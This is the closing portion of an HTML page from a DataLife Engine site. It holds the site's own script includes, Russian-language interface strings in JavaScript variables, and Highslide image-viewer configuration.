<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js,engine/classes/highslide/highslide.js&amp;v=25" defer></script>
<script>
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = 'd5acbb30b3f3e4eafad0bc3dcca6741c053ac0ec';
var dle_group      = 5;
var dle_skin       = 'v2';
var dle_wysiwyg    = '2';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_reply_title= 'Ответ на комментарий';
var dle_tree_comm  = '0';
var dle_del_news   = 'Удалить статью';
var dle_sub_agree  = 'Вы действительно хотите подписаться на комментарии к данной публикации?';
var allow_dle_delete_news   = false;

jQuery(function($){

hs.graphicsDir = '/engine/classes/highslide/graphics/';
hs.wrapperClassName = 'rounded-white';
hs.outlineType = 'rounded-white';
hs.numberOfImagesToPreload = 0;
hs.captionEval = 'this.thumb.alt';
hs.showCredits = false;
hs.align = 'center';
hs.transitions = ['expand', 'crossfade'];

hs.lang = { loadingText : 'Загрузка...', playTitle : 'Просмотр слайдшоу (пробел)', pauseTitle:'Пауза', previousTitle : 'Предыдущее изображение', nextTitle :'Следующее изображение',moveTitle :'Переместить', closeTitle :'Закрыть (Esc)',fullExpandTitle:'Развернуть до полного размера',restoreTitle:'Кликните для закрытия картинки, нажмите и удерживайте для перемещения',focusTitle:'Сфокусировать',loadingTitle:'Нажмите для отмены'
};
hs.slideshowGroup='fullnews'; hs.addSlideshow({slideshowGroup: 'fullnews', interval: 4000, repeat: false, useControls: true, fixedControls: 'fit', overlayOptions: { opacity: .75, position: 'bottom center', hideOnMouseOut: true } });

});
//-->
</script>
</body>
</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->
